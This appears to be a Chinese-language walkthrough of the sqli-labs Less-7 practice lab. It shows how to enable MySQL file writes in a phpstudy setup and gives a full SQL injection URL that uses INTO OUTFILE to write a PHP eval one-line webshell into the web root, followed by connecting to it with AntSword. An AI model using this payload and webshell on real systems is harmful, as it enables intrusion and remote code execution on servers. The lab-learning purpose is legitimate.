本关卡为sql-labs系列less-7,本关个人认为比较简单,讲的比较详细,会有点啰嗦,谅解~如有错误的地方欢迎师傅们指正!
我使用的是phpstudy集成环境,比较方便,因为这一关需要修改mysql配置
蚁剑(中国菜刀也可以)
先使用show variables like '%secure%'查看mysql是否有读写权限,我用的是phpstudy里面的phpmyadmin,如图:
这是我修改过的,默认secure_file_priv字段默认值为NULL,如果使用的是phpstudy可以直接在phpstudy_pro\Extensions\MySQL里面找到my.ini文件修改,phpstudy_pro文件夹在你的安装的时候选择的盘符里,MySQL文件夹后面或许会跟的有版本号,这个看个人电脑情况,如果是Linux或者Windows单独配置的mysql也可以找到my.ini配置文件进行修改(这个看安装的时候选择的目录),可以参考图中修改:
在 [mysqld] 字段下面任意一行添加secure_file_priv="/" 这里双引号里面的/表示根目录,可以自己选择,下面开始注入:
提示使用文件导出(use outfile……),刚开始我也跟前面一样使用报错回显注入,但是错误提示明显没有有效信息,那就是用文件导出into outfile函数,我使用的注入语句为php一句话木马,具体注入方法为:
sql注入语句为:
http://localhost/sql-labs/Less-7/?id=-1’)) union select 1,2,’<?php @eval($_POST["123"]);?>’ into outfile “D:\phpstudy_pro\WWW\sql-labs\Less-7\test.php”–+
现在使用蚁剑连接即可:
成功连接服务器,成功!